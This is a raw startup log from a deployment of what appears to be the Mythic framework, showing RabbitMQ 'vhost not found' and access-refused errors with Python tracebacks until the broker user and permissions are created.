2021-01-25 08:59:21.088 [error] <0.1055.0> Error on AMQP connection <0.1055.0> (127.0.0.1:53716 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
access to vhost 'mythic_vhost' refused for user 'mythic_user'
2021-01-25 08:59:21.088 [info] <0.1049.0> closing AMQP connection <0.1049.0> (127.0.0.1:53708 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:21.088 [info] <0.1046.0> closing AMQP connection <0.1046.0> (127.0.0.1:53712 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:21.089 [info] <0.1058.0> closing AMQP connection <0.1058.0> (127.0.0.1:53718 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:21.090 [info] <0.1052.0> closing AMQP connection <0.1052.0> (127.0.0.1:53714 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:21.090 [info] <0.1055.0> closing AMQP connection <0.1055.0> (127.0.0.1:53716 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:21.107 [info] <0.1085.0> accepting AMQP connection <0.1085.0> (127.0.0.1:53720 -> 127.0.0.1:5672)
2021-01-25 08:59:21.112 [error] <0.1085.0> Error on AMQP connection <0.1085.0> (127.0.0.1:53720 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
access to vhost 'mythic_vhost' refused for user 'mythic_user'
2021-01-25 08:59:21.114 [info] <0.1085.0> closing AMQP connection <0.1085.0> (127.0.0.1:53720 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:21.246 [info] <0.1092.0> accepting AMQP connection <0.1092.0> (127.0.0.1:53722 -> 127.0.0.1:5672)
2021-01-25 08:59:21.248 [error] <0.1092.0> Error on AMQP connection <0.1092.0> (127.0.0.1:53722 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
access to vhost 'mythic_vhost' refused for user 'mythic_user'
2021-01-25 08:59:21.250 [info] <0.1092.0> closing AMQP connection <0.1092.0> (127.0.0.1:53722 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:21.281 [info] <0.1099.0> accepting AMQP connection <0.1099.0> (127.0.0.1:53724 -> 127.0.0.1:5672)
2021-01-25 08:59:21.287 [error] <0.1099.0> Error on AMQP connection <0.1099.0> (127.0.0.1:53724 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
access to vhost 'mythic_vhost' refused for user 'mythic_user'
2021-01-25 08:59:21.287 [info] <0.1099.0> closing AMQP connection <0.1099.0> (127.0.0.1:53724 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:21.424 [info] <0.1106.0> accepting AMQP connection <0.1106.0> (127.0.0.1:53726 -> 127.0.0.1:5672)
2021-01-25 08:59:21.429 [error] <0.1106.0> Error on AMQP connection <0.1106.0> (127.0.0.1:53726 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
access to vhost 'mythic_vhost' refused for user 'mythic_user'
2021-01-25 08:59:21.430 [info] <0.1106.0> closing AMQP connection <0.1106.0> (127.0.0.1:53726 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:21.507 [info] <0.1113.0> accepting AMQP connection <0.1113.0> (127.0.0.1:53728 -> 127.0.0.1:5672)
2021-01-25 08:59:21.510 [error] <0.1113.0> Error on AMQP connection <0.1113.0> (127.0.0.1:53728 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
access to vhost 'mythic_vhost' refused for user 'mythic_user'
2021-01-25 08:59:21.511 [info] <0.1113.0> closing AMQP connection <0.1113.0> (127.0.0.1:53728 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:21.599 [info] <0.1120.0> accepting AMQP connection <0.1120.0> (127.0.0.1:53730 -> 127.0.0.1:5672)
2021-01-25 08:59:21.602 [error] <0.1120.0> Error on AMQP connection <0.1120.0> (127.0.0.1:53730 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
access to vhost 'mythic_vhost' refused for user 'mythic_user'
2021-01-25 08:59:21.603 [info] <0.1120.0> closing AMQP connection <0.1120.0> (127.0.0.1:53730 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:21.720 [info] <0.1127.0> accepting AMQP connection <0.1127.0> (127.0.0.1:53732 -> 127.0.0.1:5672)
2021-01-25 08:59:21.725 [info] <0.1130.0> accepting AMQP connection <0.1130.0> (127.0.0.1:53734 -> 127.0.0.1:5672)
2021-01-25 08:59:21.727 [info] <0.1133.0> accepting AMQP connection <0.1133.0> (127.0.0.1:53736 -> 127.0.0.1:5672)
2021-01-25 08:59:21.727 [info] <0.1136.0> accepting AMQP connection <0.1136.0> (127.0.0.1:53738 -> 127.0.0.1:5672)
2021-01-25 08:59:21.727 [info] <0.1139.0> accepting AMQP connection <0.1139.0> (127.0.0.1:53740 -> 127.0.0.1:5672)
2021-01-25 08:59:21.727 [info] <0.1142.0> accepting AMQP connection <0.1142.0> (127.0.0.1:53742 -> 127.0.0.1:5672)
2021-01-25 08:59:21.728 [error] <0.1127.0> Error on AMQP connection <0.1127.0> (127.0.0.1:53732 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
access to vhost 'mythic_vhost' refused for user 'mythic_user'
2021-01-25 08:59:21.729 [info] <0.1127.0> closing AMQP connection <0.1127.0> (127.0.0.1:53732 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:21.730 [error] <0.1130.0> Error on AMQP connection <0.1130.0> (127.0.0.1:53734 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
access to vhost 'mythic_vhost' refused for user 'mythic_user'
2021-01-25 08:59:21.731 [info] <0.1130.0> closing AMQP connection <0.1130.0> (127.0.0.1:53734 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:21.732 [error] <0.1139.0> Error on AMQP connection <0.1139.0> (127.0.0.1:53740 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
access to vhost 'mythic_vhost' refused for user 'mythic_user'
2021-01-25 08:59:21.732 [error] <0.1133.0> Error on AMQP connection <0.1133.0> (127.0.0.1:53736 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
access to vhost 'mythic_vhost' refused for user 'mythic_user'
2021-01-25 08:59:21.733 [error] <0.1136.0> Error on AMQP connection <0.1136.0> (127.0.0.1:53738 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
access to vhost 'mythic_vhost' refused for user 'mythic_user'
2021-01-25 08:59:21.733 [error] <0.1142.0> Error on AMQP connection <0.1142.0> (127.0.0.1:53742 -> 127.0.0.1:5672, user: 'mythic_user', state: opening):
access to vhost 'mythic_vhost' refused for user 'mythic_user'
2021-01-25 08:59:21.733 [info] <0.1139.0> closing AMQP connection <0.1139.0> (127.0.0.1:53740 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:21.735 [info] <0.1133.0> closing AMQP connection <0.1133.0> (127.0.0.1:53736 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:21.735 [info] <0.1142.0> closing AMQP connection <0.1142.0> (127.0.0.1:53742 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
2021-01-25 08:59:21.735 [info] <0.1136.0> closing AMQP connection <0.1136.0> (127.0.0.1:53738 -> 127.0.0.1:5672, vhost: 'none', user: 'mythic_user')
Setting permissions for user "mythic_user" in vhost "mythic_vhost" ...
2021-01-25 08:59:21.950 [info] <0.1172.0> Setting permissions for 'mythic_user' in 'mythic_vhost' to '.*', '.*', '.*'
/config_rabbit.sh Mon Jan 25 08:59:21 UTC 2021 user mythic_user created
2021-01-25 08:59:22.013 [info] <0.1176.0> accepting AMQP connection <0.1176.0> (127.0.0.1:53744 -> 127.0.0.1:5672)
2021-01-25 08:59:22.017 [info] <0.1176.0> connection <0.1176.0> (127.0.0.1:53744 -> 127.0.0.1:5672): user 'mythic_user' authenticated and granted access to vhost 'mythic_vhost'
2021-01-25 08:59:22.116 [info] <0.1194.0> accepting AMQP connection <0.1194.0> (127.0.0.1:53746 -> 127.0.0.1:5672)
2021-01-25 08:59:22.118 [info] <0.1194.0> connection <0.1194.0> (127.0.0.1:53746 -> 127.0.0.1:5672): user 'mythic_user' authenticated and granted access to vhost 'mythic_vhost'
2021-01-25 08:59:22.134 [info] <0.1213.0> accepting AMQP connection <0.1213.0> (127.0.0.1:53750 -> 127.0.0.1:5672)
2021-01-25 08:59:22.134 [info] <0.1210.0> accepting AMQP connection <0.1210.0> (127.0.0.1:53748 -> 127.0.0.1:5672)
2021-01-25 08:59:22.136 [info] <0.1210.0> connection <0.1210.0> (127.0.0.1:53748 -> 127.0.0.1:5672): user 'mythic_user' authenticated and granted access to vhost 'mythic_vhost'
2021-01-25 08:59:22.137 [info] <0.1213.0> connection <0.1213.0> (127.0.0.1:53750 -> 127.0.0.1:5672): user 'mythic_user' authenticated and granted access to vhost 'mythic_vhost'
2021-01-25 08:59:22.201 [info] <0.1240.0> accepting AMQP connection <0.1240.0> (127.0.0.1:53752 -> 127.0.0.1:5672)
2021-01-25 08:59:22.203 [info] <0.1240.0> connection <0.1240.0> (127.0.0.1:53752 -> 127.0.0.1:5672): user 'mythic_user' authenticated and granted access to vhost 'mythic_vhost'
2021-01-25 08:59:22.290 [info] <0.1256.0> accepting AMQP connection <0.1256.0> (127.0.0.1:53754 -> 127.0.0.1:5672)
2021-01-25 08:59:22.293 [info] <0.1256.0> connection <0.1256.0> (127.0.0.1:53754 -> 127.0.0.1:5672): user 'mythic_user' authenticated and granted access to vhost 'mythic_vhost'
2021-01-25 08:59:22.513 [info] <0.1273.0> accepting AMQP connection <0.1273.0> (127.0.0.1:53756 -> 127.0.0.1:5672)
2021-01-25 08:59:22.520 [info] <0.1273.0> connection <0.1273.0> (127.0.0.1:53756 -> 127.0.0.1:5672): user 'mythic_user' authenticated and granted access to vhost 'mythic_vhost'
2021-01-25 08:59:22.586 [info] <0.1290.0> accepting AMQP connection <0.1290.0> (127.0.0.1:53758 -> 127.0.0.1:5672)
2021-01-25 08:59:22.599 [info] <0.1290.0> connection <0.1290.0> (127.0.0.1:53758 -> 127.0.0.1:5672): user 'mythic_user' authenticated and granted access to vhost 'mythic_vhost'
2021-01-25 08:59:22.610 [info] <0.1302.0> accepting AMQP connection <0.1302.0> (127.0.0.1:53760 -> 127.0.0.1:5672)
2021-01-25 08:59:22.616 [info] <0.1302.0> connection <0.1302.0> (127.0.0.1:53760 -> 127.0.0.1:5672): user 'mythic_user' authenticated and granted access to vhost 'mythic_vhost'
2021-01-25 08:59:22.938 [info] <0.1319.0> accepting AMQP connection <0.1319.0> (127.0.0.1:53762 -> 127.0.0.1:5672)
2021-01-25 08:59:22.944 [info] <0.1319.0> connection <0.1319.0> (127.0.0.1:53762 -> 127.0.0.1:5672): user 'mythic_user' authenticated and granted access to vhost 'mythic_vhost'
2021-01-25 08:59:23.093 [info] <0.1331.0> accepting AMQP connection <0.1331.0> (127.0.0.1:53764 -> 127.0.0.1:5672)
2021-01-25 08:59:23.095 [info] <0.1334.0> accepting AMQP connection <0.1334.0> (127.0.0.1:53766 -> 127.0.0.1:5672)
2021-01-25 08:59:23.096 [info] <0.1337.0> accepting AMQP connection <0.1337.0> (127.0.0.1:53768 -> 127.0.0.1:5672)
2021-01-25 08:59:23.096 [info] <0.1340.0> accepting AMQP connection <0.1340.0> (127.0.0.1:53770 -> 127.0.0.1:5672)
2021-01-25 08:59:23.096 [info] <0.1343.0> accepting AMQP connection <0.1343.0> (127.0.0.1:53772 -> 127.0.0.1:5672)
2021-01-25 08:59:23.097 [info] <0.1346.0> accepting AMQP connection <0.1346.0> (127.0.0.1:53774 -> 127.0.0.1:5672)
2021-01-25 08:59:23.101 [info] <0.1331.0> connection <0.1331.0> (127.0.0.1:53764 -> 127.0.0.1:5672): user 'mythic_user' authenticated and granted access to vhost 'mythic_vhost'
2021-01-25 08:59:23.101 [info] <0.1334.0> connection <0.1334.0> (127.0.0.1:53766 -> 127.0.0.1:5672): user 'mythic_user' authenticated and granted access to vhost 'mythic_vhost'
2021-01-25 08:59:23.103 [info] <0.1337.0> connection <0.1337.0> (127.0.0.1:53768 -> 127.0.0.1:5672): user 'mythic_user' authenticated and granted access to vhost 'mythic_vhost'
2021-01-25 08:59:23.103 [info] <0.1343.0> connection <0.1343.0> (127.0.0.1:53772 -> 127.0.0.1:5672): user 'mythic_user' authenticated and granted access to vhost 'mythic_vhost'
2021-01-25 08:59:23.104 [info] <0.1340.0> connection <0.1340.0> (127.0.0.1:53770 -> 127.0.0.1:5672): user 'mythic_user' authenticated and granted access to vhost 'mythic_vhost'
2021-01-25 08:59:23.105 [info] <0.1346.0> connection <0.1346.0> (127.0.0.1:53774 -> 127.0.0.1:5672): user 'mythic_user' authenticated and granted access to vhost 'mythic_vhost'
2021-01-25 08:59:23.255 [info] <0.1426.0> accepting AMQP connection <0.1426.0> (127.0.0.1:53776 -> 127.0.0.1:5672)
2021-01-25 08:59:23.258 [info] <0.1426.0> connection <0.1426.0> (127.0.0.1:53776 -> 127.0.0.1:5672): user 'mythic_user' authenticated and granted access to vhost 'mythic_vhost'
2021-01-25 08:59:23.434 [info] <0.1438.0> accepting AMQP connection <0.1438.0> (127.0.0.1:53778 -> 127.0.0.1:5672)
2021-01-25 08:59:23.437 [info] <0.1438.0> connection <0.1438.0> (127.0.0.1:53778 -> 127.0.0.1:5672): user 'mythic_user' authenticated and granted access to vhost 'mythic_vhost'
2021-01-25 08:59:23.744 [info] <0.1450.0> accepting AMQP connection <0.1450.0> (127.0.0.1:53780 -> 127.0.0.1:5672)
2021-01-25 08:59:23.745 [info] <0.1456.0> accepting AMQP connection <0.1456.0> (127.0.0.1:53784 -> 127.0.0.1:5672)
2021-01-25 08:59:23.746 [info] <0.1453.0> accepting AMQP connection <0.1453.0> (127.0.0.1:53782 -> 127.0.0.1:5672)
2021-01-25 08:59:23.748 [info] <0.1459.0> accepting AMQP connection <0.1459.0> (127.0.0.1:53788 -> 127.0.0.1:5672)
2021-01-25 08:59:23.750 [info] <0.1462.0> accepting AMQP connection <0.1462.0> (127.0.0.1:53786 -> 127.0.0.1:5672)
2021-01-25 08:59:23.750 [info] <0.1465.0> accepting AMQP connection <0.1465.0> (127.0.0.1:53790 -> 127.0.0.1:5672)
2021-01-25 08:59:23.757 [info] <0.1450.0> connection <0.1450.0> (127.0.0.1:53780 -> 127.0.0.1:5672): user 'mythic_user' authenticated and granted access to vhost 'mythic_vhost'
2021-01-25 08:59:23.759 [info] <0.1459.0> connection <0.1459.0> (127.0.0.1:53788 -> 127.0.0.1:5672): user 'mythic_user' authenticated and granted access to vhost 'mythic_vhost'
2021-01-25 08:59:23.765 [info] <0.1456.0> connection <0.1456.0> (127.0.0.1:53784 -> 127.0.0.1:5672): user 'mythic_user' authenticated and granted access to vhost 'mythic_vhost'
2021-01-25 08:59:23.769 [info] <0.1465.0> connection <0.1465.0> (127.0.0.1:53790 -> 127.0.0.1:5672): user 'mythic_user' authenticated and granted access to vhost 'mythic_vhost'
2021-01-25 08:59:23.769 [info] <0.1462.0> connection <0.1462.0> (127.0.0.1:53786 -> 127.0.0.1:5672): user 'mythic_user' authenticated and granted access to vhost 'mythic_vhost'
2021-01-25 08:59:23.770 [info] <0.1453.0> connection <0.1453.0> (127.0.0.1:53782 -> 127.0.0.1:5672): user 'mythic_user' authenticated and granted access to vhost 'mythic_vhost'
2021-01-25 08:59:23.802 [info] <0.1537.0> accepting AMQP connection <0.1537.0> (127.0.0.1:53794 -> 127.0.0.1:5672)
2021-01-25 08:59:23.809 [info] <0.1540.0> accepting AMQP connection <0.1540.0> (127.0.0.1:53796 -> 127.0.0.1:5672)
2021-01-25 08:59:23.809 [info] <0.1543.0> accepting AMQP connection <0.1543.0> (127.0.0.1:53798 -> 127.0.0.1:5672)
2021-01-25 08:59:23.810 [info] <0.1537.0> connection <0.1537.0> (127.0.0.1:53794 -> 127.0.0.1:5672): user 'mythic_user' authenticated and granted access to vhost 'mythic_vhost'
2021-01-25 08:59:23.816 [info] <0.1543.0> connection <0.1543.0> (127.0.0.1:53798 -> 127.0.0.1:5672): user 'mythic_user' authenticated and granted access to vhost 'mythic_vhost'
2021-01-25 08:59:23.816 [info] <0.1540.0> connection <0.1540.0> (127.0.0.1:53796 -> 127.0.0.1:5672): user 'mythic_user' authenticated and granted access to vhost 'mythic_vhost'

PostgreSQL Database directory appears to contain a database; Skipping initialization


PostgreSQL Database directory appears to contain a database; Skipping initialization


PostgreSQL Database directory appears to contain a database; Skipping initialization


PostgreSQL Database directory appears to contain a database; Skipping initialization


PostgreSQL Database directory appears to contain a database; Skipping initialization

    return await self.create_task(func(self, *args, **kwargs))
  File "/usr/local/lib/python3.8/site-packages/aiormq/base.py", line 27, in __inner
    raise self.exception from e
aiormq.exceptions.ProbableAuthenticationError: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.
[2021-01-25 08:59:17 +0000] [1] [ERROR] Exception in connect_and_consume connect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/site-packages/aiormq/base.py", line 25, in __inner
    return await self.task
asyncio.exceptions.CancelledError

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "/Mythic/app/api/rabbitmq_api.py", line 1112, in connect_and_consume_c2
    connection = await aio_pika.connect_robust(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/robust_connection.py", line 271, in connect_robust
    return await connect(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/connection.py", line 332, in connect
    await connection.connect(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/robust_connection.py", line 127, in connect
    result = await super().connect(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/connection.py", line 120, in connect
    self.connection = await asyncio.wait_for(
  File "/usr/local/lib/python3.8/asyncio/tasks.py", line 455, in wait_for
    return await fut
  File "/usr/local/lib/python3.8/site-packages/aio_pika/connection.py", line 105, in _make_connection
    connection = await aiormq.connect(self.url, **kwargs)
  File "/usr/local/lib/python3.8/site-packages/aiormq/connection.py", line 526, in connect
    await connection.connect(client_properties or {})
  File "/usr/local/lib/python3.8/site-packages/aiormq/base.py", line 168, in wrap
    return await self.create_task(func(self, *args, **kwargs))
  File "/usr/local/lib/python3.8/site-packages/aiormq/base.py", line 27, in __inner
    raise self.exception from e
aiormq.exceptions.ProbableAuthenticationError: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.
got authentication failed in retrieve_user. Invalid auth token or your refresh token is gone. Login again
[2021-01-25 08:59:17 +0000] - (sanic.access)[INFO][192.168.3.175:51626]: GET http://192.168.3.172:7443/settings  302 0
[2021-01-25 08:59:17 +0000] - (sanic.access)[INFO][192.168.3.175:51626]: GET http://192.168.3.172:7443/login  200 34416
[2021-01-25 08:59:19 +0000] [1] [ERROR] Exception in connect_and_consume_rpc connect: (<pamqp.specification.Connection.Close object at 0x7f1e00205f80>, {'reply_code': 530, 'reply_text': 'NOT_ALLOWED - vhost mythic_vhost not found', 'class_id': 10, 'method_id': 40})
Traceback (most recent call last):
  File "/Mythic/app/api/rabbitmq_api.py", line 1191, in connect_and_consume_rpc
    connection = await aio_pika.connect_robust(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/robust_connection.py", line 271, in connect_robust
    return await connect(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/connection.py", line 332, in connect
    await connection.connect(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/robust_connection.py", line 127, in connect
    result = await super().connect(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/connection.py", line 120, in connect
    self.connection = await asyncio.wait_for(
  File "/usr/local/lib/python3.8/asyncio/tasks.py", line 455, in wait_for
    return await fut
  File "/usr/local/lib/python3.8/site-packages/aio_pika/connection.py", line 105, in _make_connection
    connection = await aiormq.connect(self.url, **kwargs)
  File "/usr/local/lib/python3.8/site-packages/aiormq/connection.py", line 526, in connect
    await connection.connect(client_properties or {})
  File "/usr/local/lib/python3.8/site-packages/aiormq/base.py", line 168, in wrap
    return await self.create_task(func(self, *args, **kwargs))
  File "/usr/local/lib/python3.8/site-packages/aiormq/base.py", line 25, in __inner
    return await self.task
  File "/usr/local/lib/python3.8/site-packages/aiormq/connection.py", line 269, in connect
    await self.__rpc(spec.Connection.Open(virtual_host=self.vhost))
  File "/usr/local/lib/python3.8/site-packages/aiormq/connection.py", line 201, in __rpc
    raise spec.AMQPInternalError(frame, dict(frame))
pamqp.specification.AMQPInternalError: (<pamqp.specification.Connection.Close object at 0x7f1e00205f80>, {'reply_code': 530, 'reply_text': 'NOT_ALLOWED - vhost mythic_vhost not found', 'class_id': 10, 'method_id': 40})
[2021-01-25 08:59:19 +0000] [1] [ERROR] Exception in connect_and_consume_c2_rpc connect: (<pamqp.specification.Connection.Close object at 0x7f1e0025bc00>, {'reply_code': 530, 'reply_text': 'NOT_ALLOWED - vhost mythic_vhost not found', 'class_id': 10, 'method_id': 40})
Traceback (most recent call last):
  File "/Mythic/app/api/rabbitmq_api.py", line 1226, in connect_and_consume_c2_rpc
    connection = await aio_pika.connect_robust(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/robust_connection.py", line 271, in connect_robust
    return await connect(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/connection.py", line 332, in connect
    await connection.connect(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/robust_connection.py", line 127, in connect
    result = await super().connect(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/connection.py", line 120, in connect
    self.connection = await asyncio.wait_for(
  File "/usr/local/lib/python3.8/asyncio/tasks.py", line 455, in wait_for
    return await fut
  File "/usr/local/lib/python3.8/site-packages/aio_pika/connection.py", line 105, in _make_connection
    connection = await aiormq.connect(self.url, **kwargs)
  File "/usr/local/lib/python3.8/site-packages/aiormq/connection.py", line 526, in connect
    await connection.connect(client_properties or {})
  File "/usr/local/lib/python3.8/site-packages/aiormq/base.py", line 168, in wrap
    return await self.create_task(func(self, *args, **kwargs))
  File "/usr/local/lib/python3.8/site-packages/aiormq/base.py", line 25, in __inner
    return await self.task
  File "/usr/local/lib/python3.8/site-packages/aiormq/connection.py", line 269, in connect
    await self.__rpc(spec.Connection.Open(virtual_host=self.vhost))
  File "/usr/local/lib/python3.8/site-packages/aiormq/connection.py", line 201, in __rpc
    raise spec.AMQPInternalError(frame, dict(frame))
pamqp.specification.AMQPInternalError: (<pamqp.specification.Connection.Close object at 0x7f1e0025bc00>, {'reply_code': 530, 'reply_text': 'NOT_ALLOWED - vhost mythic_vhost not found', 'class_id': 10, 'method_id': 40})
[2021-01-25 08:59:19 +0000] [1] [ERROR] Exception in connect_and_consume connect: (<pamqp.specification.Connection.Close object at 0x7f1e002738c0>, {'reply_code': 530, 'reply_text': 'NOT_ALLOWED - vhost mythic_vhost not found', 'class_id': 10, 'method_id': 40})
Traceback (most recent call last):
  File "/Mythic/app/api/rabbitmq_api.py", line 1152, in connect_and_consume_pt
    connection = await aio_pika.connect_robust(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/robust_connection.py", line 271, in connect_robust
    return await connect(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/connection.py", line 332, in connect
    await connection.connect(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/robust_connection.py", line 127, in connect
    result = await super().connect(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/connection.py", line 120, in connect
    self.connection = await asyncio.wait_for(
  File "/usr/local/lib/python3.8/asyncio/tasks.py", line 455, in wait_for
    return await fut
  File "/usr/local/lib/python3.8/site-packages/aio_pika/connection.py", line 105, in _make_connection
    connection = await aiormq.connect(self.url, **kwargs)
  File "/usr/local/lib/python3.8/site-packages/aiormq/connection.py", line 526, in connect
    await connection.connect(client_properties or {})
  File "/usr/local/lib/python3.8/site-packages/aiormq/base.py", line 168, in wrap
    return await self.create_task(func(self, *args, **kwargs))
  File "/usr/local/lib/python3.8/site-packages/aiormq/base.py", line 25, in __inner
    return await self.task
  File "/usr/local/lib/python3.8/site-packages/aiormq/connection.py", line 269, in connect
    await self.__rpc(spec.Connection.Open(virtual_host=self.vhost))
  File "/usr/local/lib/python3.8/site-packages/aiormq/connection.py", line 201, in __rpc
    raise spec.AMQPInternalError(frame, dict(frame))
pamqp.specification.AMQPInternalError: (<pamqp.specification.Connection.Close object at 0x7f1e002738c0>, {'reply_code': 530, 'reply_text': 'NOT_ALLOWED - vhost mythic_vhost not found', 'class_id': 10, 'method_id': 40})
[2021-01-25 08:59:19 +0000] [1] [ERROR] Exception in connect_and_consume connect: (<pamqp.specification.Connection.Close object at 0x7f1e002c4fc0>, {'reply_code': 530, 'reply_text': 'NOT_ALLOWED - vhost mythic_vhost not found', 'class_id': 10, 'method_id': 40})
Traceback (most recent call last):
  File "/Mythic/app/api/rabbitmq_api.py", line 1263, in connect_and_consume_heartbeats
    connection = await aio_pika.connect_robust(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/robust_connection.py", line 271, in connect_robust
    return await connect(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/connection.py", line 332, in connect
    await connection.connect(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/robust_connection.py", line 127, in connect
    result = await super().connect(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/connection.py", line 120, in connect
    self.connection = await asyncio.wait_for(
  File "/usr/local/lib/python3.8/asyncio/tasks.py", line 455, in wait_for
    return await fut
  File "/usr/local/lib/python3.8/site-packages/aio_pika/connection.py", line 105, in _make_connection
    connection = await aiormq.connect(self.url, **kwargs)
  File "/usr/local/lib/python3.8/site-packages/aiormq/connection.py", line 526, in connect
    await connection.connect(client_properties or {})
  File "/usr/local/lib/python3.8/site-packages/aiormq/base.py", line 168, in wrap
    return await self.create_task(func(self, *args, **kwargs))
  File "/usr/local/lib/python3.8/site-packages/aiormq/base.py", line 25, in __inner
    return await self.task
  File "/usr/local/lib/python3.8/site-packages/aiormq/connection.py", line 269, in connect
    await self.__rpc(spec.Connection.Open(virtual_host=self.vhost))
  File "/usr/local/lib/python3.8/site-packages/aiormq/connection.py", line 201, in __rpc
    raise spec.AMQPInternalError(frame, dict(frame))
pamqp.specification.AMQPInternalError: (<pamqp.specification.Connection.Close object at 0x7f1e002c4fc0>, {'reply_code': 530, 'reply_text': 'NOT_ALLOWED - vhost mythic_vhost not found', 'class_id': 10, 'method_id': 40})
[2021-01-25 08:59:19 +0000] [1] [ERROR] Exception in connect_and_consume connect: (<pamqp.specification.Connection.Close object at 0x7f1e002052c0>, {'reply_code': 530, 'reply_text': 'NOT_ALLOWED - vhost mythic_vhost not found', 'class_id': 10, 'method_id': 40})
Traceback (most recent call last):
  File "/Mythic/app/api/rabbitmq_api.py", line 1112, in connect_and_consume_c2
    connection = await aio_pika.connect_robust(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/robust_connection.py", line 271, in connect_robust
    return await connect(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/connection.py", line 332, in connect
    await connection.connect(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/robust_connection.py", line 127, in connect
    result = await super().connect(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/connection.py", line 120, in connect
    self.connection = await asyncio.wait_for(
  File "/usr/local/lib/python3.8/asyncio/tasks.py", line 455, in wait_for
    return await fut
  File "/usr/local/lib/python3.8/site-packages/aio_pika/connection.py", line 105, in _make_connection
    connection = await aiormq.connect(self.url, **kwargs)
  File "/usr/local/lib/python3.8/site-packages/aiormq/connection.py", line 526, in connect
    await connection.connect(client_properties or {})
  File "/usr/local/lib/python3.8/site-packages/aiormq/base.py", line 168, in wrap
    return await self.create_task(func(self, *args, **kwargs))
  File "/usr/local/lib/python3.8/site-packages/aiormq/base.py", line 25, in __inner
    return await self.task
  File "/usr/local/lib/python3.8/site-packages/aiormq/connection.py", line 269, in connect
    await self.__rpc(spec.Connection.Open(virtual_host=self.vhost))
  File "/usr/local/lib/python3.8/site-packages/aiormq/connection.py", line 201, in __rpc
    raise spec.AMQPInternalError(frame, dict(frame))
pamqp.specification.AMQPInternalError: (<pamqp.specification.Connection.Close object at 0x7f1e002052c0>, {'reply_code': 530, 'reply_text': 'NOT_ALLOWED - vhost mythic_vhost not found', 'class_id': 10, 'method_id': 40})
[2021-01-25 08:59:21 +0000] [1] [ERROR] Exception in connect_and_consume_c2_rpc connect: (<pamqp.specification.Connection.Close object at 0x7f1e002d0c40>, {'reply_code': 530, 'reply_text': "NOT_ALLOWED - access to vhost 'mythic_vhost' refused for user 'mythic_user'", 'class_id': 10, 'method_id': 40})
Traceback (most recent call last):
  File "/Mythic/app/api/rabbitmq_api.py", line 1226, in connect_and_consume_c2_rpc
    connection = await aio_pika.connect_robust(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/robust_connection.py", line 271, in connect_robust
    return await connect(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/connection.py", line 332, in connect
    await connection.connect(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/robust_connection.py", line 127, in connect
    result = await super().connect(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/connection.py", line 120, in connect
    self.connection = await asyncio.wait_for(
  File "/usr/local/lib/python3.8/asyncio/tasks.py", line 455, in wait_for
    return await fut
  File "/usr/local/lib/python3.8/site-packages/aio_pika/connection.py", line 105, in _make_connection
    connection = await aiormq.connect(self.url, **kwargs)
  File "/usr/local/lib/python3.8/site-packages/aiormq/connection.py", line 526, in connect
    await connection.connect(client_properties or {})
